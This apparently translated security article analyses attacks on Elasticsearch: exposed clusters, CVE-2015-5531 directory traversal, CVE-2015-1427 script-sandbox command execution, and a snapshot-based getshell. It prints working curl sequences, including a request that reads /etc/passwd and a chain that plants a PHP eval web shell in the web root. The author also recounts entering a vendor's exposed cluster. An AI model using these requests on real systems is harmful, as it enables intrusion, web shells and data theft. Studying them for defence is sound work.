Attacking Big Data Applications: An Analysis (Part I)
0x01 Preface
With the advent of the big data era, more and more big data technologies are being put into actual production. As security personnel, however, our focus must be on security: what security problems does a big data environment face? Looking back, many people on wooyun have already raised individual issues of this kind, but I found no systematic treatment. So in this article I will sort out the vulnerability categories in this area along with some problems I have run into myself, as an exploratory summary. I hope sharing it helps broaden your thinking.
0x02 Big Data Technology Introduction
Here I will briefly introduce some big data technologies, for readers who are less familiar with this area.
Hadoop: a basic framework for distributed systems, consisting mainly of HDFS and MapReduce. HDFS (the Hadoop Distributed File System) stores large volumes of data across many machines and has mechanisms to ensure integrity and fault tolerance. MapReduce provides a programming model that, through the simple Mapper and Reducer abstractions, lets large datasets be processed concurrently and in a distributed manner on unreliable clusters of dozens to hundreds of commodity PCs.
Apache Spark: a new-generation big data processing engine that provides a distributed in-memory abstraction to support applications with working sets.
Hive: an HDFS-based data warehouse; all of its data is stored in the file system.
ZooKeeper: an open-source distributed application coordination service, providing configuration maintenance, naming, distributed synchronization, group services, and similar functions.
NoSQL databases: mainly non-relational databases, including the common Redis, MongoDB, Memcache, HBase, and Neo4j.
ELK: Elasticsearch + Logstash + Kibana, an open-source log collection and analysis platform.
Because big data covers a huge range of applications, and the related technologies are vaster still, and because the author has only recently stepped into the big data circle and has a limited understanding, corrections and suggestions are welcome.
0x03 Elasticsearch Vulnerabilities
As mentioned above, ELK (Elasticsearch + Logstash + Kibana) is an open-source log collection and analysis platform. Elasticsearch itself is a Lucene-based search server. It provides a distributed, multi-tenant full-text search engine behind a RESTful web interface. Developed in Java and released as open source under the Apache license, it is a popular enterprise search engine: designed for cloud computing, it delivers real-time search and is stable, reliable, fast, and easy to install and use. This article focuses on some of the security problems in Elasticsearch.
1. Unauthorized Access
Unauthorized access is probably the most serious security problem Elasticsearch currently faces. A considerable number of enterprises place their clusters directly on the public network without any access restrictions, so attackers can directly read a great deal of internal information. Some time ago I found that a large cloud vendor in China had exposed the log cluster of one of its security products to the public network, and I took that opportunity to penetrate the cluster. This reflects a real problem: the security of big data applications has not yet received enough attention. If even the large vendor just mentioned has this problem, other vendors hardly need mentioning. So what does unauthorized access to Elasticsearch look like?
Elasticsearch's default port is 9200. I set up an environment locally; accessing it directly yields roughly the following:
We can see the version number, build date, Lucene version, and other information. But what use is this by itself? Not much yet. Here we need to pick up some basic Elasticsearch knowledge; a Chinese translation of the authoritative Elasticsearch guide is available at http://es.xiaoleilu.com/index.html.
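One practical use of that banner is version triage. A minimal Python sketch, assuming a banner shaped like the 1.x-era response (the JSON below is a simplified, hypothetical sample, not captured from a real host):

```python
import json

# Hypothetical banner modeled on what a bare GET to port 9200 returns
# in the 1.x era; field layout is an assumption for illustration.
banner = json.loads("""
{
  "status": 200,
  "name": "node-1",
  "version": {
    "number": "1.4.2",
    "lucene_version": "4.10.2"
  },
  "tagline": "You Know, for Search"
}
""")

def parse_version(info):
    """Extract the Elasticsearch version as a comparable integer tuple."""
    return tuple(int(x) for x in info["version"]["number"].split("."))

ver = parse_version(banner)
print(ver)            # (1, 4, 2)
# Versions before 1.6 fall in scope for the snapshot traversal bug
# discussed later in this article.
print(ver < (1, 6))   # True
```

Comparing tuples this way avoids the classic string-comparison pitfall where "1.10" sorts before "1.6".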
Unlike traditional databases, Elasticsearch organizes data in terms of nodes, indexes, shards, and replicas. It also has a rich plug-in library that makes visual data operations convenient. The following uses the head plug-in as an example; its usual access path is http://localhost:9200/_plugin/head.
This plug-in conveniently exposes many Elasticsearch functions and parameters.
The panel in the upper-right corner shows much of Elasticsearch's current status; its meaning is easy enough to work out. From here you can also add, query, modify, and delete indexes.
Of course, most importantly, we can see all the data and field formats in the cluster. Elasticsearch is mostly used to store logs, which usually contain physical paths, backend addresses, account passwords from captured packets, IP addresses, and so on; all of this is quite helpful for subsequent penetration. Many enterprises even store user information directly in Elasticsearch, and the danger of that needs no explanation. Here is a picture from an actual penetration.
This is the log cluster of an online lending platform. Server types, website physical paths, user access records, IP addresses, access devices, browsers, and more are clearly visible; not all fields are shown because there are too many. Moreover, log clusters like this usually serve the whole enterprise, so the data volume typically runs to millions or even tens of millions of records.
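When facing an exposed cluster with too many fields to eyeball, it helps to triage the index mappings automatically. A hedged sketch: the mapping dict below mimics the shape of a `GET /_mapping` response, but the index, type, and field names are entirely made up for illustration.

```python
# Keyword fragments that suggest sensitive log content.
SENSITIVE = ("passwd", "password", "token", "ip", "path", "cookie")

# Hypothetical mappings, shaped like a GET /_mapping response (1.x style:
# index -> type -> properties); all names here are invented.
mappings = {
    "weblog-2016.01": {
        "access": {"properties": {
            "client_ip": {"type": "string"},
            "request_path": {"type": "string"},
            "user_agent": {"type": "string"},
        }},
        "auth": {"properties": {
            "username": {"type": "string"},
            "password": {"type": "string"},
        }},
    }
}

def sensitive_fields(mappings):
    """Return (index, type, field) triples whose field name looks sensitive."""
    hits = []
    for index, types in mappings.items():
        for doc_type, body in types.items():
            for field in body.get("properties", {}):
                if any(k in field.lower() for k in SENSITIVE):
                    hits.append((index, doc_type, field))
    return sorted(hits)

for hit in sensitive_fields(mappings):
    print(hit)
```

Against a real cluster one would feed this the parsed `_mapping` output instead of the sample dict.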
Without the head plug-in, are these operations impossible? Obviously not. Everything the head plug-in does can be accomplished by sending requests to Elasticsearch directly. For example, to add an index named dept containing a type employee, where the document with id 32 has a field empname whose value is emp32, we only need to send a request like this:

curl -XPUT 'http://localhost:9200/dept/employee/32' -d '{"empname": "emp32"}'

Similarly, to view this data, simply access:

http://localhost:9200/dept/employee/32

This is a simple example; all related operations can be completed with similar requests. And head is only one plug-in among many: the Elasticsearch plug-in library is actually quite rich. For example, if the _river plug-in is installed, you can directly view database connection configuration information.
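The curl example above can equally be issued from a script. A minimal Python sketch that builds (but deliberately does not send) the same PUT request, with the host and names taken from the example:

```python
import json
import urllib.request

# Build the same PUT request the curl example issues; nothing is contacted.
url = "http://localhost:9200/dept/employee/32"
body = json.dumps({"empname": "emp32"}).encode("utf-8")

req = urllib.request.Request(
    url,
    data=body,
    method="PUT",
    headers={"Content-Type": "application/json"},
)

print(req.get_method())   # PUT
print(req.full_url)
# urllib.request.urlopen(req) would actually send it; only do that
# against a cluster you are authorized to test.
```

The point is simply that the whole REST surface is scriptable with nothing but the standard library.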
We can use Shodan to check how many Elasticsearch instances are open to the public Internet.
Shodan shows a large number of hosts with port 9200 open, and few other services run on that port. Discounting possible confounding factors, it appears that a considerable share of Elasticsearch services worldwide allow unauthorized access.
2. Directory Traversal
This vulnerability is CVE-2015-5531, a directory traversal (directory listing) vulnerability disclosed last year. Let us look at the vulnerability description:
The root cause is that Elasticsearch does not validate backup snapshot names, so an attacker can construct malicious names to achieve directory traversal. Versions 1.0 through 1.6 are affected.
Exploitation method:
(1) Create a snapshot repository named test:

curl -XPUT 'http://127.0.0.1:9200/_snapshot/test' -d '{
  "type": "fs",
  "settings": {
    "location": "/tmp/test"
  }
}'
(2) Create another repository, test2, whose location points to the snapshot-backdata directory. Note that Elasticsearch names its snapshot backup files in the snapshot-xxx format.

curl -XPUT 'http://127.0.0.1:9200/_snapshot/test2' -d '{
  "type": "fs",
  "settings": {
    "location": "/tmp/test/snapshot-backdata"
  }
}'
(3) Elasticsearch now treats snapshot-backdata as a backup snapshot named backdata inside the test repository, and on finding that it is a directory it continues reading the contents inside. At this point we construct malicious snapshot names such as ../../../../../etc/passwd so that Elasticsearch recursively reads the file content, producing directory traversal. The compound query feature of the head plug-in can also easily issue these requests.
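The mechanics of step (3) come down to naive path joining. A small Python illustration of why the ".." components escape the repository (the paths mirror the example above; this models the flaw, it is not Elasticsearch's code):

```python
import posixpath

# The repository resolves a snapshot name relative to its location.
location = "/tmp/test/snapshot-backdata"
snapshot_name = "../../../../../../etc/passwd"

# Without validation, joining and normalizing walks out of the repository.
resolved = posixpath.normpath(posixpath.join(location, snapshot_name))
print(resolved)   # /etc/passwd
```

The fix in later versions amounts to rejecting snapshot names containing path separators before any such join happens.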
3. Command Execution
Elasticsearch has seen several code execution vulnerabilities, such as CVE-2014-3120 from the year before last and the better-known CVE-2015-1427 from last year; both abuse the script syntax supported by its search functionality to execute commands. The wooyun knowledge base has a detailed analysis of CVE-2015-1427.
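As a concrete illustration, the widely published request body for CVE-2015-1427 (sent to the _search endpoint) looks roughly like the following; this is reproduced from public proof-of-concept write-ups, so treat the exact field names as indicative rather than authoritative:

```json
{
  "size": 1,
  "script_fields": {
    "cmd": {
      "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"
    }
  }
}
```

The reflection chain through java.lang.Math.class.forName is what slips past the Groovy sandbox's class blacklist.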
To put it briefly: after CVE-2014-3120 broke out, Elasticsearch switched its search scripting language from MVEL to Groovy and added a sandbox, but because the sandbox's filtering was not strict, attackers could bypass it and execute commands. The principle is not hard; the real effort went into the bypass.

4. Getshell

This getshell is very interesting. At present the only Chinese analysis is on the discoverer's blog, so it may well be that researcher's 0day. The problem has been fixed since version 1.6.
Exploitation involves the following steps:
(1) Create a malicious index containing a trojan:

curl -XPOST 'http://localhost:9200/test.php/test.php/1' -d '{
  "<?php eval($_POST[chr(97)]); ?>": "test"
}'
(2) Remove any snapshot repository that already exists under the name test.php:

curl -XDELETE 'http://localhost:9200/_snapshot/test.php'
(3) Create the repository with its backup directory pointed at the web application directory:

curl -XPUT 'http://localhost:9200/_snapshot/test.php' -d '{
  "type": "fs",
  "settings": {
    "location": "/data/httpd/htdocs/default",
    "compress": false
  }
}'
(4) Snapshot the trojan-bearing index into the repository directory:

curl -XPUT 'http://localhost:9200/_snapshot/test.php/test.php' -d '{
  "indices": "test.php",
  "ignore_unavailable": "true",
  "include_global_state": false
}'
0x04 Conclusion

This article introduced four types of attacks against Elasticsearch; apart from unauthorized access, these vulnerabilities have all been fixed. Big data security is still unfamiliar territory for many security researchers, so relatively few vulnerabilities have been exposed, and application security in this area receives comparatively little attention. But as big data applications continue to develop, I believe more practitioners will join research in this field.